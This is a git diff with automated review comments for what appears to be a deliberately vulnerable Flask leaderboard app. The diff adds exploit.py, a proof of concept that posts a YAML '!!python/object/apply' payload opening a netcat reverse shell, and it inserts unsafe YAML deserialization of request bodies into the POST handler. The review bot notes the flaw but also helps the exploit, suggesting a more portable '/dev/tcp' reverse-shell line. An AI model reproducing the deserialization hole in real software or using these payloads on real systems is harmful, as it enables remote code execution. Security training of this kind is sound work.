diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..50a0482
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+leaderboard.yaml
diff --git a/exploit.py b/exploit.py
new file mode 100644
index 0000000..be244c8
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,11 @@
+import requests
+
+malicious_yaml = """
+!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
+"""
+url = "http://127.0.0.1:8080/api/leaderboard"
+headers = {
+    "Content-Type": "text/yaml"
+}
+response = requests.post(url, headers=headers, data=malicious_yaml)
+print(response.text)
diff --git a/flask_base/app.py b/flask_base/app.py
index 9c6e3f3..604ed45 100644
--- a/flask_base/app.py
+++ b/flask_base/app.py
@@ -13,17 +13,27 @@ if not os.path.exists(LEADERBOARD_FILE):
 
 def read_leaderboard():
     with open(LEADERBOARD_FILE, 'r') as f:
-        return yaml.load(f, Loader=yaml.UnsafeLoader) or []
+        return yaml.safe_load(f) or []
 
 def write_leaderboard(data):
+    print(data)
     with open(LEADERBOARD_FILE, 'w') as f:
         yaml.safe_dump(data, f)
 
 @app.route('/api/leaderboard', methods=['POST'])
 def add_to_leaderboard():
-    new_entry = request.json
+    if request.content_type == 'text/yaml' or request.content_type == 'application/yaml':
+        try:
+            new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader)
+        except yaml.YAMLError:
+            return jsonify({'error': 'Invalid YAML format'}), 400
+    else:
+        new_entry = request.json
+
+    print(new_entry)
     if not new_entry or 'name' not in new_entry or 'score' not in new_entry:
         return jsonify({'error': 'Name and score are required'}), 400
+
     leaderboard = read_leaderboard()
     leaderboard.append(new_entry)
     write_leaderboard(leaderboard)
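Review bot: `response = requests.post(url, headers=headers, data=malicious_yaml)` has no timeout, and once the payload fires the server handler sits inside `os.system("nc -e /bin/bash ...")` for as long as that shell lives, so the script blocks forever on the response it then prints. Pass `timeout=5` and catch `requests.exceptions.ReadTimeout`, which for this PoC is the expected outcome rather than an error. `nc -e` exists only in the traditional/GNU netcat; the OpenBSD netcat shipped by default on Debian/Ubuntu lacks it, so the listener on 127.0.0.1:1111 may never get a connection — a `bash -i >& /dev/tcp/127.0.0.1/1111 0>&1` payload is more portable. This proof of concept targets the `text/yaml` branch of `add_to_leaderboard` in `flask_base/app.py`; say so in a header comment and make sure the file is excluded from any deployable image of the app.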
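Review bot: `new_entry = yaml.load(request.data, Loader=yaml.UnsafeLoader)` deserializes the raw request body with the loader that honours `!!python/object/apply`, so any client sending `Content-Type: text/yaml` gets arbitrary code execution in the Flask process — the same class of flaw this commit removes from `read_leaderboard` a few lines above, and exactly what the accompanying `exploit.py` drives. Unless this is a deliberately vulnerable branch for the training scenario (then say so in a comment and keep it out of any deployable build), use `new_entry = yaml.safe_load(request.data)`. The validation that follows also assumes a mapping: a body that parses to a string such as `"name score"` passes `'name' not in new_entry` by substring match and a non-zero integer raises `TypeError` (a 500), so guard with `if not isinstance(new_entry, dict) or 'name' not in new_entry or 'score' not in new_entry:`. `request.content_type` is compared as an exact string, so `text/yaml; charset=utf-8` silently falls through to `request.json`; `request.mimetype` strips the parameters. The two added `print(...)` calls look like leftover debugging and will dump every submitted entry to the server log.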
@@ -38,19 +48,18 @@ def get_leaderboard():
 @app.route('/questions')
 def show_questions():
     with open('./data/quizz.json', 'r') as file:
-        #questions = json.load(file)["outils_list"]
         questions = json.load(file)
     return render_template('quiz.html', questions=questions)
-
-
 
 @app.route('/')
 def main():
     return render_template('index.html')
 
 @app.route('/pokemon')
 def poke():
-    return render_template('pokemon.html')
+    with open('./data/softwares.json', 'r') as file:
+        softwares = json.load(file)["outils_list"]
+    return render_template('pokemon.html', data=softwares)
 
 @app.route('/PAI')
 def pai():
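Review bot: `softwares = json.load(file)["outils_list"]` in `poke` turns a missing `./data/softwares.json` or a missing `outils_list` key into an unhandled exception and a 500 on every hit to `/pokemon`, and re-reads the file on each request; `show_questions` above already does the same per-request read, so this is consistent with the file but worth tightening. At minimum `softwares = json.load(file).get("outils_list", [])` keeps the page rendering with an empty list, and reading both JSON files once at import time would avoid the per-request disk I/O. Both paths are relative to the process working directory rather than the module, which only works if the app is always started from the directory containing `data/` — presumably how the existing `quizz.json` read already behaves. `pai` is only opened in this hunk; its body lies outside the view.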